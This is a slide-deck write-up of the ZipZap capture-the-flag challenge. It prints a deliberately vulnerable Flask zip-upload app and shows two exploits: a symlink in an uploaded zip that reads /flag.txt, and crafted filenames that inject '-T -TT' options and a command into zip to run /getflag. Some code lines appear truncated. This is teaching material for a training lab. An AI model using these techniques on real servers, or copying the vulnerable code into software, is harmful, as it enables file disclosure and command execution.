class: center, middle name: start # ZipZap CTF Writeup![:i](fas fa-door-open) .footer[30th May 2022</br>_Friday Talks_ @ ![:i](fab fa-suse)] --- class: left, middle # Danilo Spinella ### _Software Engineer in Packaging_ ### **SUSE** ![:i](fab fa-suse) --- class: left, middle ![]( Italian training program in cybersecurity for high-school and undergraduate students. --- class: left, middle ![]( Participated in 2020 Volunteered to help in 2021 Worked as an instructor in 2022 --- class: left, middle ## Capture The Flags (CTFs) Find the flag by exploiting a security vulnerability --- class: middle, left ## ![:i](fas fa-list) Contents ZipZap overview First vulnerability Second vulnerability --- class: left, middle # ![:i](fas fa-code) ZipZap overview --- background-image: url(/img/zipzap_ctf_writeup/mainpage.jpg) --- class: left, middle After a login, a *uid* gets generated from the username `http://endpoint/<uid>` --- background-image: url(/img/zipzap_ctf_writeup/upload.jpg) --- class: middle, left Let's create a zip archive with a test file in it ```bash $ echo test > test.txt $ zip test.txt adding: text.txt (stored 0%) ``` --- background-image: url(/img/zipzap_ctf_writeup/testzip.jpg) --- class: left, middle ## We can... a single file (by clicking into it) ...remove a single file all our files as a zip archive ...upload another zip archive --- class: left, middle # Vulnerability ![:i](fas fa-1) --- class: left, middle Zap `/flag.txt` --- class: left, middle ## Let's dive into the code ![:i](fas fa-code) ~230 lines of python flask application --- class: left, middle # Disclaimer ![:i](fas fa-exclamation) The code listed here is the original code shared to the participants. It is left untouched, including the comments. --- class: left, middle ## List user files ```python @app.route('/<uid>') def list_files(uid): # # List every file uploaded by the user # uid = os.path.basename(uid) path = os.path.join(app.config['USERPATH'], uid) try: files = [file for file in os.listdir(path)] ... ``` --- ## Upload user zip archives (1/3) ```python @app.route('/<uid>', methods=['POST']) def upload(uid): # # Upload a zip file and then extract it # uid = os.path.basename(uid) path = os.path.join(app.config['USERPATH'], uid) # some sanity check ... # Save the file with a safe name zip_filename = secrets.token_urlsafe(8) + '.zip' zip_path = os.path.join(path, zip_filename) try: except IsADirectoryError: abort(400) ``` --- ## Upload user zip archives (2/3) ```python # Calc length: we don't want any files larger than 4kb try: # unzip -Zt return a string similar to: 4 files, 49 bytes uncompressed, 44 bytes compressed: 10.2% # a quick and dirty way to parse this is to split the string, with ' ' as delimiter, # and then parse the 3rd. This is also a _very_ dirty way to check if the file is a valid # zip file. command = 'unzip -Zt ' + zip_path out =' '), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, timeout=5) size = out.stdout.decode() size = size.split(' ')[2] size = int(size) if size > app.config['MAX_UNCOMPRESSED_SIZE']: raise FileTooBigException ``` --- ## Upload user zip archives (3/3) ```python # Now we can unzip everything command = 'unzip -j -o {}'.format(zip_path) with open(os.devnull, 'wb') as devnull: # exec unzip in the user directory' '), stdout=devnull, stderr=devnull, shell=False, cwd=path) except subprocess.TimeoutExpired: abort(500) except (ValueError, IndexError): abort(500) except FileTooBigException: flash('Zip file too big') return redirect(url_for('list_files', uid=uid)) finally: os.remove(os.path.join(path, zip_path)) return redirect(url_for('list_files', uid=uid)) ``` --- class: left, middle ## Brainstorming ![:i](fas fa-brain) --- class: left, middle ## The answer is... --- class: left, middle ## ...symlinks ![:i](fas fa-exclamation) --- class: left, middle ## First try ```bash $ ln -s /flag.txt flag.txt $ zip flag.txt zip warning: name not matched: flag.txt ``` --- class: left, middle ## Second try ```bash $ ln -s /flag.txt flag.txt $ zip --symlink flag.txt adding: flag.txt (stored 0%) ``` --- background-image: url(/img/zipzap_ctf_writeup/flagtxt.jpg) --- class: left, middle Congratz! Here's your flag. CCIT{XXXXXXXXXXXXXXXXXXXXXXXXXXXX} To get the second flag, execute /getflag --- class: left, middle ## Vulnerability ![:i](fas fa-2) --- ## Download all (1/3) ```python @app.route('/<uid>/zip') def zip(uid): # # Create a zip file from user's uploaded files # path = os.path.join(app.config['USERPATH'], uid) try: # file list. This simple check should prevent a zip recursion. Also yea, users # can't upload any zip file files = [filename for filename in os.listdir( path) if not filename.endswith('.zip')] # # Now some security checks # def get_fullpath(filename): return os.path.join( path, filename) ``` --- ## Download all (2/3) ```python # Sort the file list. files = sorted(files) # Sanitize all filenames. files = map(lambda x: os.path.basename(x), files) # check that we aren't zipping directories files = filter(lambda x: not os.path.isdir(get_fullpath(x)), files) # Limit the len of the files we are zipping. Yeah, there can't be # be any files greater that app.config['MAX_UNCOMPRESSED_SIZE'], but you never know files = filter(lambda x: os.stat(get_fullpath(x)).st_size < app.config['MAX_UNCOMPRESSED_SIZE'], files) # We don't want to compress more that 20 files files = list(files) if len(files) > 20: files = files[:20] # out of one? idk and I don't care except (FileNotFoundError, NotADirectoryError): return redirect(url_for('index')) ``` --- ## Download all (3/3) ```python # create a random zip name new_zip_name = secrets.token_urlsafe(8) + '.zip' new_zip_path = os.path.join(path, new_zip_name) # create the command command = ['zip', new_zip_path] command += files with open(os.devnull, 'wb') as devnull: # exec unzip in the user directory, stdout=devnull, stderr=devnull, shell=False, cwd=path, timeout=5) try: resp = make_response( send_file(new_zip_path, as_attachment=True, attachment_filename=new_zip_name)) resp.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate' return resp except: abort(500) finally: if os.path.exists(new_zip_path): os.remove(os.path.join(path, new_zip_path)) ``` --- class: left, middle ## Brainstorming ![:i](fas fa-brain) Part ![:i](fas fa-2) --- class: left, middle ## We need to Execute `/getflag` on the server Save its output Retrieve the output --- class: left, middle ## Problems `zip` is the only command called `/` cannot be used in valid filenames --- class: left, middle ## Idea ![:i](fas fa-lightbulb) --- class: left, middle ## Inject commands to `zip` via filenames --- class: left, middle **-TT** *cmd*</br> **--unzip-command** *cmd*</br> Use command cmd instead of `unzip -tqq` to test an archive when the **-T** option is used. On Unix, to use a copy of unzip in the current directory instead of the standard system unzip, could use: `$ zip archive file1 file2 -T -TT "./unzip -tqq"` --- ## Solution (1/3) Symlink a local file to `/getflag` Change `PATH` to the current folder Execute the symlink Save its output to a file in the current folder --- ## Solution (2/3) Upload the zip archive Click the `Download all` button Download the file that now appears after a reload --- ## Solution (3/3) ```bash $ ln -s /getflag getflag $ touch -- -T $ touch -- -TT $ touch -- 'PATH="." getflag>flag.txt' $ zip vuln2 -y -- * $ ls -T -TT 'PATH="." getflag>flag.txt' flag.txt getflag ``` --- class: center, middle # Questions ![:i](fas fa-question) --- class: center, middle #![:i](fab fa-creative-commons) ![:i](fab fa-creative-commons-by) ![:i](fab fa-creative-commons-sa) ## This work is licensed under ## _Attribution-ShareAlike 4.0 International</br> (CC BY-SA 4.0)_ .footer[Icons from _www.onlinewebfonts.com_, which are licensed under CC BY 3.0] --- template: start